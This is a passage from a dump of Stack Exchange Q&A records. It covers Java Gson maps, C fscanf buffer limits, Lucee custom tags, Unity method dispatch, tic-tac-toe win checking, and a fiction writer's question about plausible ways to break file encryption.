\"pull out\" the ID into a HashMap key, then set the value to be your object. \nI can't remember how Gson handles the conversion of the object values in the map, but this is the general idea\n<code>List<ServiceRequest> reqs = getAllReqs();\n\nHashMap<Integer, ServiceRequest> map = new HashMap<Integer, ServiceRequest>();\nfor (ServiceRequest access : reqs) {\n map.put(access.getId(), access);\n}\n\nGson gson = new GsonBuilder().setPrettyPrinting().create();\nString json2 = gson.toJson(map); \/\/ TODO: Not sure if this will work\nreturn json2;\n<\/code>\n","meta":{"source":"stackoverflow","title":"Set SQLite data to JsonObject class without using Stringbuilder","dup_signals":{}},"subset":"stackexchange"} +{"text":"Array containing more characters than specified\n\nQuestion: I am learning file management in C. I wrote this code and the output wasn't what I expected. \n<code>#include <stdio.h>\n\nint main(int argc, char * argv[]){\n int i;\n char str[12];\n FILE *fp;\n fp = fopen(\"Names.dat\", \"w+\");\n for(i = 1; i < argc; i++){\n fprintf(fp, \"%s \", argv[i]);\n }\n rewind(fp);\n fscanf(fp,\"%[^\\n]\", str);\n printf(\"%s\", str);\n return 0;\n}\n<\/code>\nI compiled it and ran it as follows\n<code>gcc test.c\na abcdefghijklmnopqrstuvwxyz\n<\/code>\nThe output was as follows:\n<code>abcdefghijklmnopqrstuvwxyz\n<\/code>\nI thought it would output only first 12 letters.\nWhere did I go wrong in my thought process?\nAnswer: <code>fscanf(fp,\"%[^\\n]\", str);<\/code> attempts to read characters and writes them to memory, starting at str, until '\\n' or EOF is encountered, regardless of the length of str\nSo, with\n\n<code>char str[12];\n...\nfscanf(fp,\"%[^\\n]\", str);\n<\/code>\n\nreading the string of 27 characters \"abcdefghijklmnopqrstuvwxyz \" from the file writes 28 characters from &str[0] and has an unspecified behavior (probably a crash). \n\nArray containing more characters than specified\n\nno, <code>str[12]<\/code> allows to store 11 characters more the null ending character, nothing more.\nTo read at most 11 characters from the file do :\n<code>fscanf(fp,\"%11[^\\n]\", str);\n<\/code>\nDoing that, compilation and execution :\n<code>pi@raspberrypi:\/tmp $ gcc -g -pedantic -Wextra m.c\npi@raspberrypi:\/tmp $ .\/a.out abcdefghijklmnopqrstuvwxyz\nabcdefghijkpi@raspberrypi:\/tmp $ \n<\/code>\nand under valgrind :\n<code>pi@raspberrypi:\/tmp $ valgrind .\/a.out abcdefghijklmnopqrstuvwxyz\n==10408== Memcheck, a memory error detector\n==10408== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.\n==10408== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info\n==10408== Command: .\/a.out abcdefghijklmnopqrstuvwxyz\n==10408== \nabcdefghijk==10408== \n==10408== HEAP SUMMARY:\n==10408== in use at exit: 352 bytes in 1 blocks\n==10408== total heap usage: 3 allocs, 2 frees, 5,472 bytes allocated\n==10408== \n==10408== LEAK SUMMARY:\n==10408== definitely lost: 0 bytes in 0 blocks\n==10408== indirectly lost: 0 bytes in 0 blocks\n==10408== possibly lost: 0 bytes in 0 blocks\n==10408== still reachable: 352 bytes in 1 blocks\n==10408== suppressed: 0 bytes in 0 blocks\n==10408== Rerun with --leak-check=full to see details of leaked memory\n==10408== \n==10408== For counts of detected and suppressed errors, rerun with: -v\n==10408== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 6 from 3)\n<\/code>\nP.S. add a \\n in the printf <code>printf(\"%s\\n\", str);<\/code> of use puts to have a more readable result :\n<code>pi@raspberrypi:\/tmp $ gcc -g -pedantic -Wextra m.c\npi@raspberrypi:\/tmp $ .\/a.out abcdefghijklmnopqrstuvwxyz\nabcdefghijk\npi@raspberrypi:\/tmp $ \n<\/code>\nP.S. of course to read 12 characters from the file do\n<code>char str[13];\n...\nfscanf(fp,\"%12[^\\n]\", str);\n<\/code>\nAnswer: Even though you allocated an array of size 12 this doesn't mean you cannot write (or read) beyond its boundaries.\n<code>fscanf<\/code> expects a pointer as third argument and pointer have no information regarding length as such <code>fscanf<\/code> cannot know how much memory you allocated, this is the reponsability of the caller.\nC is very liberal when it comes to accessing memory ;) \nComment: This answer is crudely written. The fact that the array size is 12 **does** mean you cannot read or write beyond its boundaries while strictly conforming to the C standard. It ought to be explained in what senses one can attempt to read or write beyond the array and what the possible consequences are.\n","meta":{"source":"stackoverflow","title":"Array containing more characters than specified","dup_signals":{}},"subset":"stackexchange"} +{"text":"Associating child tag data with grandparent tag using CFC-based custom tags\n\nQuestion: The full repro case for this question is in my GitHub repository. I'll only reproduce the necessary bits here.\nLet's say I have this usage of some custom tags:\n<code><!--- testCfcTags.cfm --->\n<cfimport taglib=\"cfcBasedTags\" prefix=\"t\">\n\nText before tags<br>\n<t:grandparent gp:attr=\"set in grandparent\">\n Text in grandparent, before parent<br>\n <t:parent p:attr=\"set in parent\">\n Text in parent, before child<br>\n <t:child c:attr=\"set in child\">\n Text in child<br>\n <\/t:child>\n Text in parent, after child<br>\n <\/t:parent>\n Text in grandparent, after parent<br>\n<\/t:grandparent>\nText after tags<br>\n<\/code>\nIf I was using CFM-based custom tags, and I was to want to associate data from within my implementation of the <code>child<\/code> tag with the <code>grandparent<\/code> tag, I would simply to this:\n<code><!--- child.cfm --->\n<cfif thistag.executionMode eq \"end\">\n <cfassociate basetag=\"cf_grandparent\" datacollection=\"childAttributesForGrandparent\"><!--- this line --->\n <cfassociate basetag=\"cf_parent\" datacollection=\"childAttributesForParent\">\n<\/cfif>\n<\/code>\nNote I can associate directly to the grandparent tag.\nI cannot work out how to do this cleanly with Lucee's CFC-based custom tags.\nThis is the best I can come up with:\n<code>\/\/ Child.cfc\ncomponent {\n\n function init(hasEndTag, parent){\n this.parent = arguments.parent;\n }\n\n function onEndTag(attributes, caller, generatedContent){\n writeOutput(generatedContent);\n this.parent.childattributesForParent = attributes;\n this.parent.parent.childattributesForGrandparent = attributes;\n return false;\n }\n\n}\n<\/code>\nAnd in Parent.cfc I have this:\n<code>\/\/ Parent.cfc\ncomponent {\n\n function init(hasEndTag, parent){\n this.parent = arguments.parent;\n }\n\n function onEndTag(attributes, caller, generatedContent){\n writeOutput(generatedContent);\n this.parent.parentattributesForGrandparent = attributes;\n writeDump(var=this.childAttributesForParent, label=\"Parent childAttributesForParent\");\n return false;\n }\n\n}\n<\/code>\nThat cumulative (mis-)usage of the <code>this<\/code> scope of Parent and Grandparent means from Child I can bung stuff straight into the Grandparent via <code>this.parent.parent<\/code>.\nHowever that's all a bit \"Heath Robinson\". Given the rest of Lucee's CFC-based custom tag implementation is pretty slick, I am sure I'm just missing something. I really don't think I ought to have to burrow through the Parent to get to the Grandparent. Also it means that the code would need to differ for situations in which the Child is directly within the Grandparent. What I really need is for some tag-hierarchy to be passed between CFCs, not simply the parent.\nI've googled about, but most of what's out there is written by me (which is in turn based on the blog articles originally written for Railo's implementation of this - which is what the Lucee implementation is based on).\nDocs I've already read, which are no help:\n\nRailo: CFC-based custom tags\nCFC-based Custom Tags by Example - Part 1\nCFC-based Custom Tags by Example - Part 2\nCFC-based Custom Tags by Example - Part 3\nComment: Is it worth tagging this as coldfusion and railo too... those who are maybe using lucee but not following the tag yet might miss this?\nAnswer: According to the Railo blog:\nhttp:\/\/blog.getrailo.com\/post.cfm\/cfc-based-custom-tags-by-example-part-1\n\nYou can use the tag cfassociate and the function GetBaseTagList and >GetBaseTagData the same way as for regular CFML based custom tags.\n\nSo you can do (in cfscript):\n<code>cfassociate(basetag=\"cf_grandparent\", datacollection=\"childAttributesForGrandparent\"); \n<\/code>\nI've thrown together a gist with some samples - I've tested and verified it works on Lucee 4.5.1:\nhttps:\/\/gist.github.com\/dajester2013\/183e862915972d51279f\nEdit: Option 2, base tag approach:\nBased on my comment, here is a potential approach via base tag - it at leasts masks the not-so-pretty aspects:\nBaseTag.cfc\n<code>component accessors=true {\n\n property name=\"tagName\";\n property name=\"parent\";\n property name=\"hasEndTag\";\n\n public BaseTag function init() {\n structAppend(variables, arguments);\n\n tagName = \"cf_\" & lcase(listLast(getMetaData(this).fullname,\".\"));\n\n return this;\n }\n\n public any function getParent(string tagName, ancestors=1) {\n if (!isNull(tagName)) {\n\n var data = getBaseTagData(tagName, ancestors);\n if (structKeyExists(data,\"thisTag\")) {\n return data.thisTag;\n\n \/\/ getBaseTagData returns the variables scope for CFC tags...\n } else if (structKeyExists(data, \"this\")) {\n return data.this;\n }\n } else if (!isNull(variables.parent)) {\n return variables.parent;\n }\n }\n\n private void function associate(required string tagName, string dataCollection=this.getTagName()) {\n cfassociate(basetag=tagname, dataCollection=dataCollection);\n }\n\n}\n<\/code>\nTestChild.cfc\n<code>component extends=BaseTag {\n\n public function onStartTag() {\n attributes._childId = randrange(1000,9000);\n associate(\"cf_testtag\", \"testchildren\");\n\n writedump(var=this.getParent(),label='immediateparent');\n writedump(var=this.getParent(\"cf_testtag\"), label='testtag');\n abort;\n }\n\n}\n<\/code>\nComment: Cheers, but yeah, I know that (I link to the same article above). But that's kinda \"in spite\" of the CFC-based approach to the issue, not in-complement to it. If you read the next sentence in the article \"These features are not really easy to use, so we looked for another way of interaction between tags\" Micha kinda alludes to the idea that using `` is not the preferred way to do this sort of thing with CFC-based custom tags. However doesn't go on to say how one *should* do this via another mechanism. I suspect they have simply overlooked it.\nComment: Another option would be to implement a base component you extend all your tags from. Inside that base component you would define some accessor methods. I'm thinking something along the lines of ExtJS's component selectors: `this.up(\"tag_name\");`\n","meta":{"source":"stackoverflow","title":"Associating child tag data with grandparent tag using CFC-based custom tags","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unity c# Firing another GameObject's methods. Better way?\n\nQuestion: I have TCP client (Unity c#) and server (WinForms app c#). I need my server sending some JSON commands, like this: \n<code>{ \"\"ObjName\"\": \"\"Cube_2\"\", \"\"Method\"\":\"\"MoveLeft\"\", \"\"Delay\"\":0}\n<\/code>\nThis certain command says to find GameObject \"Cube_2\" and fire method \"MoveLeft\".\nWhen i recieve this from server, i convert it into my AOSCommand class:\n<code>public class AOSCommand\n{\n public string ObjName;\n public string Method;\n public int delay;\n}\n<\/code>\nAnd then i do the following (which i think is not the best solution, so here is a question):\n<code>private void ProcessCommand(AOSCommand command)\n {\n GameObject cube = GameObject.Find(command.ObjName);\n MonoBehaviour script = cube.GetComponent(command.ObjName.Split(new string[] {\"_\"}, StringSplitOptions.None)[0]) as MonoBehaviour;\n script.Invoke(command.Method, command.delay);\n }\n<\/code>\nHow can i fire some method from AOSCommand.Method string in a better way?\nThe script attached to Cube_2 (and Cube_1 and may be attached to unknown count of other objects):\n<code>using UnityEngine;\n\npublic class Cube : MonoBehaviour {\n\n private GameObject thisObj;\n\n private void Start()\n {\n thisObj = this.gameObject;\n }\n\n public void MoveLeft()\n {\n thisObj.transform.Translate(new Vector3(1,0,0));\n }\n\n public void MoveRight()\n {\n thisObj.transform.Translate(new Vector3(-1, 0, 0));\n }\n}\n<\/code>\nAnswer: It depends what you consider wrong.\nYou should have a single script that takes care of the parsing of the incoming data, this would remove the need to search for a component, it would always be the same.\nThen you can have a dictionary of to replace the invoke call.\nSo your snippet turns into:\n<code>private void ProcessCommand(AOSCommand command)\n{\n GameObject cube = GameObject.Find(command.ObjName);\n AOSDispatch dispatch = cube.GetComponent<AOSDispatch>()\n if(dispatch == null){ return; } \/\/ or debug or exception\n dispatch.Call(command);\n}\n<\/code>\nthis is on the main receiver. Then comes the script on the cubes:\n<code>public class AOSDispatch : MonoBehaviour\n{\n Dictionary<string, Action> dict;\n void Start()\n {\n dict.Add(\"MoveLeft\", MoveLeft);\n dict.Add(\"MoveRight\", MoveRight);\n }\n public void Call(AOSCommand command)\n {\n if(dict.Contains(command.Method) == false){ return; } \/\/Or debug\n \/\/ use the delay as well as you wish\n dict[command.Method]();\n }\n private void MoveLeft(){} \n private void MoveRight(){}\n}\n<\/code>\nThis is not necessarily better, just my two cents on it.\nEDIT: there was comment mentioning the json could contain the script type to know what script to use. I would not go this way. AOSDispatch will take care of the dispatching of the message.\nMessage says MoveLeft, AOSDispatch can either treat the info or forward to a movement controller:\n<code>public class AOSDispatch : MonoBehaviour\n{\n [SerializeField] private MoveController moveCtrl = null;\n Dictionary<string, Action> dict;\n void Start()\n {\n dict.Add(\"MoveLeft\", this.moveCtrl.MoveLeft);\n dict.Add(\"MoveRight\", this.moveCtrl.MoveRight);\n }\n public void Call(AOSCommand command)\n {\n if(dict.Contains(command.Method) == false){ return; } \/\/Or debug\n \/\/ use the delay as well as you wish\n dict[command.Method]();\n }\n}\npublic class MoveController: MonoBehaviour\n{\n private void MoveLeft(){} \n private void MoveRight(){}\n}\n<\/code>\nthere you go, message is forward and cleanly, the AOSDispatch does only the job it is meant to do, dispatch the AOS.\nSECONDARY EDIT:\nOn second thought, here is an improved version.\nCreate a DispatchManager game object and add the following script:\n<code>public class AOSDispatch:MonoBehaviour\n{\n private IDictionary<string, AOSController> dict;\n void Awake(){\n this.dict = new Dictionary<string, AOSController>(); \n AOSController.RaiseCreation += ProcessCreation;\n AOSController.RaiseDestruction += ProcessDestruction;\n }\n void OnDestroy()\n {\n AOSController.RaiseCreation -= ProcessCreation;\n AOSController.RaiseDestruction -= ProcessDestruction;\n }\n private void ProcessCreation(AOSController controller){\n this.dict.Add(controller.name, controller);\n }\n private void ProcessDestruction(AOSController controller){\n AOSController temp= null;\n if(this.dict.TryGetValue(controller.name, out temp) == true){\n this.dict.Remove(name);\n }\n }\n private void ProcessCommand(AOSCommand command)\n {\n AOSController controller = null;\n if(this.dict.TryGetValue(command.ObjName, out controller) == true){\n controller.Call(command);\n return;\n }\n }\n}\n<\/code>\nand then on the objects you have the AOSController that forwards the info as before (just renaming):\n<code>public class AOSController: MonoBehaviour\n{\n public static event Action<AOSController> RaiseCreation;\n public static event Action<AOSController> RaiseDestruction;\n [SerializeField] private MoveController moveCtrl = null;\n Dictionary<string, Action> dict;\n void Start()\n {\n if(RaiseCreation != null) { RaiseCreation(this); }\n dict.Add(\"MoveLeft\", this.moveCtrl.MoveLeft);\n dict.Add(\"MoveRight\", this.moveCtrl.MoveRight);\n }\n void OnDestroy()\n {\n if(RaiseDestruction != null) { RaiseDestruction(this); }\n }\n public void Call(AOSCommand command)\n {\n if(dict.Contains(command.Method) == false){ return; } \/\/Or debug\n \/\/ use the delay as well as you wish\n dict[command.Method]();\n }\n}\npublic class MoveController: MonoBehaviour\n{\n private void MoveLeft(){} \n private void MoveRight(){}\n}\n<\/code>\nOn Awake, the Dispatch registers to the static event from the AOSController. In the AOSController.Start, the object triggers the event and passes itself to the AOSDispatch. That one adds it to the dictionary. On destruction, the AOSDispatch gets the event and removes the AOSController.\nNow you have a collection that at any given time contains all the AOSController in the scene.\nAs a result, you don't need to perform a GameObject.Find since you can get the object from the dictionary (real fast process). \nComment: Many thanks! I do think your way should be a little faster.\nComment: I'd also add a type to your Json command in order to use `FindObjectOfType` that's more typesafe.\nComment: You don't need the type if you rely on the AOSDispatch to know what to do.\nComment: @\u0418\u0432\u0430\u043d\u0414\u043e\u0431\u0440\u044f\u043a\u043e\u0432 I have added a secondary edit which uses events. If there is something you do not understand, please ask.\n","meta":{"source":"stackoverflow","title":"Unity c# Firing another GameObject's methods. Better way?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Declaring winner in tic tac toe board\n\nQuestion: I wrote a code for a tic tac toe problem where you input the numbers into the array and the board will be printed out. There is also a function that declares the winner, but doesn't seem to be working, the function is supposed to declares the winner for any size of a tic tac toe board (right now it is 5x5).\nI did a double for loop with it checking if the character is the same in the array as next to it so it moves along the rows, there's another for columns, one diagonal and the other. For some reason it isn't showing any winners, no winners always comes up. Any help is appreciated.\n<code>#include <stdio.h>\n\n#define TRUE 1\n#define FALSE 0\n\n#define SIZE 3\n\n#define NONE -1\n#define NOUGHTS 0\n#define CROSSES 1\n#define EMPTY 2\n\nvoid scanBoard(int board[SIZE][SIZE]);\nvoid printBoard(int board[SIZE][SIZE]);\nint getWinner(int board[SIZE][SIZE]);\n\nint main( void ){\n\n int board[SIZE][SIZE];\n int winner;\n\n printf(\"Please enter the board:\\n\");\n scanBoard( board );\n\n printf(\"Here is the board:\\n\");\n printBoard( board );\n\n printf(\"The winner is: \");\n\n winner = getWinner(board);\n\n if(winner == CROSSES){\nprintf(\"Crosses\");\n}\n else if(winner == NOUGHTS){\nprintf(\"Noughts\");\n}\n else{\nprintf(\"No one\");\n}\nreturn 0;\n}\n\nvoid scanBoard(int board[SIZE][SIZE]){\n\nint i;\nint j;\n\nfor(i=0; i<SIZE; i++){\n for(j=0; j<SIZE; j++){\n scanf(\"%d\", &board[i][j]);\n }\n}\n}\n\nvoid printBoard(int board[SIZE][SIZE]){\n\nint i;\nint j;\n\nfor(i=0; i<SIZE; i++){\n for(j=0; j<SIZE; j++){\n if(board[i][j] == EMPTY){\n printf(\". \");\n }\n else if(board[i][j] == CROSSES){\n printf(\"X \");\n }\n else if(board[i][j] == NOUGHTS){\n printf(\"O \");\n }\n } \n printf(\"\\n\"); \n}\n\n}\n\nint getWinner(int board[SIZE][SIZE]){\n\nint i;\nint j;\nint check;\nint winner;\n\nfor(i=0; i<SIZE; i++){\n for(j=0; j<SIZE-1 && check == TRUE; j++){\n if(board[i][j] != board[i][j+1]){\n check = FALSE;\n }\n }\n if(check == TRUE && j == SIZE-1){\n winner=board[i][0];\n }\n}\nfor(j=0; j<SIZE; j++){\n for(i=0; i<SIZE-1 && check == TRUE; i++){\n if(board[i][j] != board[i+1][j]){\n check = FALSE;\n }\n }\n if(check == TRUE && i == SIZE-1){\n winner=board[0][j];\n }\n}\nfor(i=0; i<SIZE-1 && check == TRUE; i++){\n if(board[i][i] != board[i+1][i+1]){\n check = FALSE;\n }\n if(check == TRUE && i == SIZE-1){\n winner=(board[i][i]);\n }\n}\nfor(i=SIZE; i>0 && check == TRUE; i--){\n if( board[i][i] != board[i-1][i-1])\n check = FALSE;\n}\n if(check == TRUE && i == SIZE-1){\n winner=(board[i][i]);\n}\nreturn winner;\n}\n<\/code>\nAnswer: As Giorgi pointed out, you have to initialize <code>check<\/code> before you start testing its value. You also need to initialize <code>winner<\/code> to <code>EMPTY<\/code> at the start of the <code>getWinner()<\/code> function, otherwise if there is no winner, your function will return some unpredictable junk value and your <code>main()<\/code> function will probably print out the wrong result.\n<code>int getWinner(int board[SIZE][SIZE]){\n int i;\n int j;\n int check;\n int winner=EMPTY \/* <<< *\/;\n\n for(i=0; i<SIZE; i++){\n for(j=0, check=TRUE \/* <<< *\/; j<SIZE-1 && check == TRUE; j++){\n if(board[i][j] != board[i][j+1]){\n check = FALSE;\n }\n }\n if(check == TRUE && j == SIZE-1){\n winner=board[i][0];\n }\n }\n for(j=0; j<SIZE; j++){\n for(i=0, check=TRUE \/* <<< *\/; i<SIZE-1 && check == TRUE; i++){\n if(board[i][j] != board[i+1][j]){\n \/** etc... **\/\n<\/code>\n(Note: There's also no need to continue checking once you've found a winner, so perhaps instead of <code>winner=board[i][j];<\/code> you could just <code>return board[i][j];<\/code>. Not a big deal, though.)\nYou are also checking one of the diagonals twice (in two different directions). The other diagonal isn't being checked at all.\nComment: Thanks for the help, It seemed to be initialising check=true before the second for loop worked. I'm going to look into the diagonals now but I think I got it now.\nAnswer: I did not go completely through your checking logic but here directly in <code>getWinner<\/code>, you are trigerring undefined behaviour:\n<code> for(j=0; j<SIZE-1 && check == TRUE; j++){\n<\/code>\nby reading <code>check<\/code> variable which has not been initialized (result of this is that any kind of behaviour can happen). So you may want to initialize it to default value first.\nThere are some implementationos of that game around, I suggest you look at some similar implementation and compare against your winner checking logic for example.\nComment: Thanks, just needed the extra bit of making check=TRUE did it.\nComment: 1) thanks for posting code that actually cleanly compiles. 2) Please, for us humans to easily read\/understand the code, consistently indent. Suggest 4 spaces after every opening brace '{' and un-indent before every closing brace '}' Never use tabs as every wordprocessor\/editor has the tab stops\/tab width set differently. Note: 4 spaces is wide enough so the indent is still visible with variable width fonts\nComment: a comparison like: `check == TRUE` is almost always a bad idea. (in this case we know what TRUE is equal to) Normally, anything not 0 is TRUE. So usually best to say things like: `if( check )` or `if( check != FALSE )`\n","meta":{"source":"stackoverflow","title":"Declaring winner in tic tac toe board","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cryptography elements needed for a story\n\nQuestion: Note: following Maarten Bodewes's answer, I edited this post to make it clearer.\nI'm writing something partly driven by the need to crack a few encrypted files.\nThis is what needs to happen in the story:\nThere are two parties involved that are trying to crack them, party A and party B. Party A has had them for four years, and despite all attempts, they failed. Party B got the files later on and managed to crack them in less than two months of non-stop trying.\nParty A has available state-of the-art tech, but party B are the good guys and this is a sci-fi story, so they have far, far better tech that nobody else has. The details of the technology aren't relevant to the story so I don't need to establish them.\nParty B will eventually succeed; still, to keep a modicum of suspense up, it must still be possible for them to fail. By this I don't mean that something throws a spanner in their works; I mean that their decryption attempt, however more advanced than party B's, isn't guaranteed to work. In other words, party B can't just sit and wait until whatever they're doing is done knowing that at that point they will have the decrypted file.\nThis is what I need:\n\nAn algorithm such that, if you encrypt a file with it using a high-entropy password, is beyond any brute-force attempts using known methods and tech. (This is why party A fails.) I understand that AES-256 might be what I'm looking for.\nAn approach that will allow party B to succeed nonetheless. The fact that party B has much faster computers available than anyone on Earth is central to the story so you can assume that. However, if brute-forcing these files required ridiculous amounts of energy or other very unrealistic things, I'm not prepared to claim party B has any of that. Other approaches or situations that would give party B an edge\u2014such knowing what algorithm was used, being able to guess details about the password, or knowing about possible key files\u2014are certainly options I would consider. If quantum computers could plausibly break AES, that's another option I would consider because it's not too far-fetched for party B to have them. I just don't know if QC could actually do that.\nComment: Your biggest problem is not the technology. Your biggest problem is going to be that with this technology, you need a strong reason for your protagonists to focus on this problem and not something else. If you've aced quantum computing, for example, why would you do this and not (for instance) use it to untraceably steal money from dictators' bank accounts, plant convincing evidence of malfeasance for politicians you don't like, or whatever?\nComment: ... And further to that, you'd need justification for why the NSA, MI5 or whatever agency have not locked you in a small room filled with large men, until you agree not to use what you know, or are unwillingly drafted into whatever agency as a national security asset. All these will either be plot holes if you don't address them, or subplots if you do. (I was tempted to make this an answer, but really it's comments around the question's context, as a reader of books like this, and not actually answering the question.)\nAnswer: Though quantum computers fit the requirements, I'm not sure they are the best option. A general purpose quantum computer capable of attacking modern encryption (RSA, AES) would have serious ramifications on society. It's not only applicable to this one cipher you are breaking.\nDoes it have to be the superior computing resources which gives the good guys the edge? Because I can think of several plausible storylines where the edge comes from a bright idea.\nOption 1: Information about the passphrase.\nIf the good guys learn something about how the passphrase used to derive the encryption key was chosen they could easily reduce the search space time from millennia to months. For example the passwords are always lines from a book where some of the words are replaced with the first letter. Or something else. One way to learn such a pattern is they crack some other password picked by the same person which was encrypted with weaker encryption. The hero recognizes the pattern in this other password hypothesizes it may be a common method of selecting passwords and starts a brute force dictionary attack on the reduced space.\nOption 2: General Cryptanalytic improvement.\nOur hero is a master cryptographer. And uses an unknown but plausible cryptanalytic attack on AES to greatly improve speed. This attack could have greatly reduced runtime and it could work on only a fraction of the keys. It could be discovered that a sizeable fraction of keys have some undesired property which makes a superior attack possible (which still requires great computational resources) and they are unsure if the key happens to be such a weak key, they are likely to be able to quantify their success probability in advance.\nOption 3: Identifying a flaw in how the data was encrypted\nWhoever encrypted the data may have messed up. And accidentally left an easier route to attack it. It could be something like applying error correction after compression before encryption (the flaw in GSM). Or something which more directly leads to an attack like keeping a simple hash of the password. The heroes find this flaw and launch a more efficient brute force based on it.\nOption 4: Attack the message not the key\nOut heroes don't try to crack the encryption at all. They utilize knowledge of message and compression system used. and find what possible messages would result in desired size. Though if it's only size it's only viable if we had a small collection of possible messages and the attack will be quick. There are attacks on voice for example where we use size and timing to decipher words and phrases without breaking the encryption.\nComment: Some more possibilities along the lines of option 1: if the files were encrypted by a password that had been frequently typed on some specific keyboard, then if the good guys get the keyboard, they could look at what keys were used more and use that to significantly speed up their attack. Or if the good guys got an audio recording of the password being typed, etc.\nComment: Regarding Option 1, I remember an episode from Elementary about a safe to unlock where the passphrase was just some Pi digits. That was a very unsatisfying episode, given how \"easy\" it is to guess.\nComment: Convoluted way to implement option 1: Say that I have files A and B encrypted with AES-256 and different pwds. I understand that the encryption program will take each pwd, generate a key out of them, and use the key to encrypt\\decrypt. Say A is a lot smaller than B. Will this make it faster to attack A's key? If A's key is found, can A's pwd be reconstructed from its key? (I guess knowing the key and the algorithm restricts the possible pwds from which the key was derived). The good guys could then deduce a pattern from the pwd that they found this way, and try to crack B using this info.\nAnswer: \nParty B will eventually succeed; still, to keep a modicum of suspense up, it must still be possible for them to fail\n\nAn approach that will allow party B to succeed nonetheless\n\nTo me the obvious solution is strategy and HUMINT.\nWith algorithms at the time, say bcrypt and AES-256, plus a high entropy password, party A would spend eternity either attacking the key directly or trying to bruteforce the password. The sun would literally burn out before they succeed. Thus the only option is to discover the correct password, or get very close so they can brute force a similar password derived from what they think it might be.\nAnd thus the best, possibly only option is to use intelligence gathering, psychology, social engineering , etc., trying to figure out what kind of password would have been used by whoever encrypted the files. Maybe they used a similar password on a website that did not use good key derivation (md5), maybe it is something from their past, like a favorite quote. Either way, the frantic search for intelligence gathering, sending people out to research, talk to old friends and colleagues, would probably make for an engaging storyline.\nComment: HUMINT will definitely play a role, though there's something I need to understand anyway. Say I use symmetric encryption, because no file transfer is involved. I know my password by heart and it's stored nowhere else than my head. Do I understand correctly that, each time I want to decrypt my file, the program I'm using will take my password, re-create the symmetric key depending on the algorithm used, and then use the key to decrypt the file?\nComment: @Nicola Generally that is the case, though that can be done in a hardware security module for better security, the password is captured by the HSM, the key is derived, and the ciphertext is converted to plaintext by the HSM. You can also use a password plus a key that is stored on the HSM, so you need that in possession and connected to the computer to decrypt\nAnswer: It's nice to see SciFi authors consulting professionals for technical viability problems. I've got something on my mind for you to consider.\n\nThis is what I need:\nAn algorithm such that, if you encrypt a file with it using a\nhigh-entropy password, is beyond any brute-force attempts using\nknown methods and tech.\n\nThere was a joke a while back in the NIST Post-Quantum Cryptography Standardization project, Daniel J. Berstein proposed pqRSA (which is just RSA with rediculously large public keys) for public-key encryption and digital signature. I think you could say the files are encrypted with <code>3072-bit Elliptic-Curve ElGamal<\/code>\n\nAn approach that will allow party B to succeed nonetheless\n\nQuantum computers of course, but party B must use their special\/innovative\/patented technology to make some kind of huge breakthrough.\nI'd recommend the story progress from party B attempting to <code>entangle 8192 qubits into superposition<\/code>, to them <code>successfully implement extended Euclidean Algorithm (EGCD) over the qubits<\/code>.\nThese are actual current engineering challenges! As of August 2020, we've yet to exceed 100 fully-controlled qubits.\nAnswer: A real-life example:\nWe had a zip file encrypted w\/ the older, rather weak encryption algorithm, used before the introduction of AES-based encryption in the ZIP format.\nThere are brute-force tools to crack ZIP file passwords, there is also a peciliarity of the particular encryption that allows for very quick check for 65535 of every 65536 passwords. Those 1\/65536 of the probable passwords that pass the first test need to decrypt a whole file in order to see if it is the actual password.\nThe ZIP file contained a stray Thumbs.db file.\nThe first person approaching the task removed the Thumbs.db file from the ZIP as no one needed it in the first place (a misguided optimization) and then ran the brute-force tool. It ran for a lot of time on a rather powerful machine - and failed.\nThe second person got only the Thumbs.db file as it was a lot smaller than all other files so it could decrypt and decompress faster at each attempt. They removed all other files from the ZIP. They used for the possible password the alphabet native to the author of the ZIP file and only capital letters (deducing the habits of the author from the file names and other available info). They had success in 2-3 days using a lot weaker hardware. The password cracked against the Thumbs.db file happened to work for all other files in the archive.\nTo paraphrase Al Capone: You can get much further with a brute force and an educated guess than with a brute force alone.\nAnswer: I don't really like your setup. Party A has available state-of the-art tech, yet party B wins because they are the good guys while they are both doing basically the same is a bit unrealistic. It could happen that both parties try at random and one is just luckier (and, oh surprise, they are the good guys).\nI would recommend on making party B have an advantage based on having better knowledge on the subject who encrypted it. So for example, party A killed brilliant scientist (let's say Albert) and robbed his plans of a XYZ. Party B (after getting a copy, 4 years later) wants to avoid those falling into the evil hands, and have helping them an old friend of Albert \/ his widow \/ an apprentice... This gives party B an advantage, as they may know some of the passwords Albert used, and thus hypothesize the likely structure of the password they are looking for.\nOr both parties may know that Albert probably used a pet name with some added numbers \/ symbols. While party A bruteforcing is based on lists like Top 1200 Pet Names, Albert friend suddenly remembers (after an evening with his niece) that the first pet of Albert was named after a Pokemon, which then made party B work from a completely different list.\nAnswer: \nThese files were encrypted in 2003. AES is from 2001 if I'm not mistaken, so that's possible, right?\n\nSure. The Rijndael algorithm was first published in 1998, so that's a 5 year gap.\n\nParty B gets the files only later on and manages to crack them in less than two months of continuous trying.\n\nThat's not possible if they are well-encrypted. Either the passwords are weak enough or a different attack is found.\n\nDetails of the tech aren't relevant to the story so I don't need to write about them, but I want to avoid writing things that just don't make sense\n\nSuch as requiring more energy that available in the solar system? We're talking AES-256 here.\n\nMy first guess would be that, advanced as it may be, their tech has limits too and there is such a thing as a password long enough to make their attempts futile.\n\nSounds a bit boring, what about a hardware failure or power outage?\n\nIs it possible to figure out what encryption algorithm was used if all you have is the encrypted files themselves?\n\nDepends on the protocol really, otherwise no, probably not from just the ciphertext. With AES and the file date, just guessing the protocol \/ AES would be good.\nTo make it interesting you could maybe specify an attack where classical analysis is combined with quantum analysis that speeds up the classical analysis more than Grover's law would allow for. AES is not provable secure after all, so better attacks can be found.\nAnswer: Party B could discover that the key was generated from a password and the details of the Key Derivation Function used. Then instead of attacking the encryption key, they can attack the password, which could reduce the number of possibilities to the point where their advanced computers can find the right password in a couple of months.\nAnswer: Depending on what your definition of \"the good guys\" is, you could have a backdoor that has been subtly leaked into the algorithms. The famous DUAL_EC_DRBG would be a case study on this. Of course, since you can use a fictitious algorithm, there's no need for it to be obvious that the particular back door always works. The bad guys could have picked different keys, but thanks to social engineer, there's a really good chance that they picked keys that were publicly recommended, but weak.\nAnother possibility is that the algorithm has a flaw which affects the encryption with some probability. Say, 98% of keys are actually poor keys which permit an attack, while 2% are resilient to it. This sort of thing 